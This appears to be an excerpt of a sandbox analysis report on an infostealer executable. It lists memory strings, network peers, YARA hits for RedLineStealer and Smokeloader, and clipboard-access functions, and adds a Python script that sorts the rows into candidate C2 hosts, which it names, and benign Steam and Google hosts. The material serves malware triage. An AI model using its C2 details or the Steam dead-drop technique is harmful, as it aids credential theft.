      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://player.vimeo.com
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steam.tv/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
      Source: HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.nrM
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
      Source: HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900lN
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107370383.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
      Source: HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_004329C0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_004329C0
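      The string and network rows above mix three kinds of data: hosts the stealer contacts, page content (Steam, Google reCAPTCHA, YouTube) that happened to be in memory, and carved strings cut mid-way or with a few stray bytes appended ("login.s", "akamaized.nrM"). The following triage script is an added example for this page, not code from the Joe Sandbox report or from the sample. The benign-host allowlist, the fragment heuristic and the sample rows (copied from the report, source column shortened) are this example's own constructions; it also pulls out any 17-digit Steam profile ID, because Lumma builds have been widely reported to read their live C2 from a Steam profile page (background knowledge, not a finding stated in this report).

```python
"""Triage the 'String found in binary or memory' and 'HTTPS traffic
detected' rows of a Joe Sandbox report. Added example; not part of the
report or of the sample. Allowlist and sample rows are constructed."""
import re
from urllib.parse import urlsplit

# Hosts expected in a stealer's memory because it parsed Steam / Google
# page content; treated as context rather than as C2 candidates.
# Assumption: list written for this example, not taken from the report.
KNOWN_BENIGN_SUFFIXES = (
    "steampowered.com", "steamcommunity.com", "steam.tv", "akamaized.net",
    "valvesoftware.com", "google.com", "gstatic.com", "gstatic.cn",
    "recaptcha.net", "youtube.com", "ytimg.com", "vimeo.com", "medal.tv",
    "sketchfab.com",
)

STRING_RE = re.compile(r"String found in binary or memory:\s*(\S+)")
TLS_RE = re.compile(
    r"HTTPS traffic detected:\s*(\d+(?:\.\d+){3}):(\d+)\s*->\s*"
    r"\d+(?:\.\d+){3}:\d+\s*version:\s*(.+?)\s*$")
STEAM_PROFILE_RE = re.compile(r"steamcommunity\.com/profiles/(\d{17})")

# Constructed sample: rows copied from the report, source column shortened.
SAMPLE_ROWS = """\
Source: 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/outloo
Source: 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.s
Source: 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
Source: 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.nrM
Source: 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900lN
Source: 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
"""


def is_fragment(host):
    """Heuristic for a carved string that is not a whole hostname: no dot,
    a last label shorter than two characters, or a last label that is not
    plain lower-case letters (e.g. 'nrM' where 'net' was expected)."""
    if not host or "." not in host:
        return True
    tld = host.rsplit(".", 1)[1]
    return len(tld) < 2 or not (tld.isalpha() and tld.islower())


def is_benign(host):
    return any(host == s or host.endswith("." + s) for s in KNOWN_BENIGN_SUFFIXES)


def triage(rows):
    """Split report rows into C2-candidate hosts, known-benign hosts,
    unusable fragments, embedded Steam profile IDs and TLS peers."""
    out = {"candidates": set(), "benign": set(), "fragments": set(),
           "steam_profiles": set(), "tls_peers": set()}
    for row in rows:
        m = STRING_RE.search(row)
        if m:
            url = m.group(1).rstrip(";")      # ';' is header/CSP residue
            # netloc keeps the original case; .hostname would lower-case
            # 'nrM' and hide the fragment
            host = urlsplit(url).netloc.rsplit("@", 1)[-1].split(":")[0]
            if is_fragment(host):
                out["fragments"].add(url)
                continue
            pm = STEAM_PROFILE_RE.search(url)
            if pm:
                out["steam_profiles"].add(pm.group(1))
            out["benign" if is_benign(host) else "candidates"].add(host)
            continue
        m = TLS_RE.search(row)
        if m:
            out["tls_peers"].add((m.group(1), int(m.group(2)), m.group(3)))
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for key, values in triage(SAMPLE_ROWS.splitlines()).items():
        print(f"{key}: {values}")
```

On the sample rows the two hosts left in "candidates" are lev-tolstoi.com and lv.queniujq.cn; everything on the Steam and Google side lands in "benign", and the two carved fragments are kept separately so they can be matched by hand against the complete strings elsewhere in the report rather than blocked as IOCs.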

      System Summary

      Source: 00000000.00000002.2488177075.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00408850
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0040ACF0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00423860
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00438810
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0041682D
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004288CB
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043D880
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004218A0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00430940
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00403970
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00420939
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004179C1
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004231C2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004241C0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043B1D0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004291DD
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043D980
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00405990
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00422190
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043D997
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043D999
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004091B0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0042CA49
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0042DA53
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00416263
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0040EA10
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00415220
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0042CAD0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004252DD
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0041B2E0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00406280
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043DA80
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0041E290
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0041CB40
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043D34D
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00426B50
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043DB60
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00436B08
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0042830D
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0042CB11
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00404320
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0042CB22
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00425327
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00408330
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043F330
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0042A33F
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0040DBD9
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00424380
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0041FC75
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0041DC00
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00429C2B
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004291DD
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004074F0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0041148F
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0042AC90
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043ECA0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0040CD46
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00437500
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00422510
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00417DEE
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00437DF0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00409580
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0041759F
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00425E70
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00436E74
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00427603
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00425E30
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004286C0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043AEC0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004266D0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004236E2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00405EE0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0041DE80
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00402F50
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00420F50
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00438F59
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00406710
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00423F20
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043F720
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00419F30
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0041E7C0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004197C2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0042DFE9
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0040A780
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00411F90
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00418792
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00415799
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043EFB0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00748055
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00768057
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0074E0E7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_007560D7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_007670DB
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00753166
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00736147
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0076B127
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_007421F7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_007511B7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0074A197
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0075E250
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0074D230
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0076F217
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_007523F7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00759444
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00739417
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0074E4F7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_007364E7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0074B547
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0075351D
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0076D5B4
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0076F597
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00738597
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00734587
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_007416F6
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00755694
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00754687
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00752777
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00767767
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00737757
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_007397E7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00747806
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00736977
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00756937
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00758927
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0073A9E7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0076F987
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00768A77
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0074EA27
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00749A29
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00738AB7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00751B07
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00735BF7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00733BD7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00760BA7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00750BA0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0073EC77
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0075CCB0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0075DCBC
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0075CD78
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00766D6F
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0075CD37
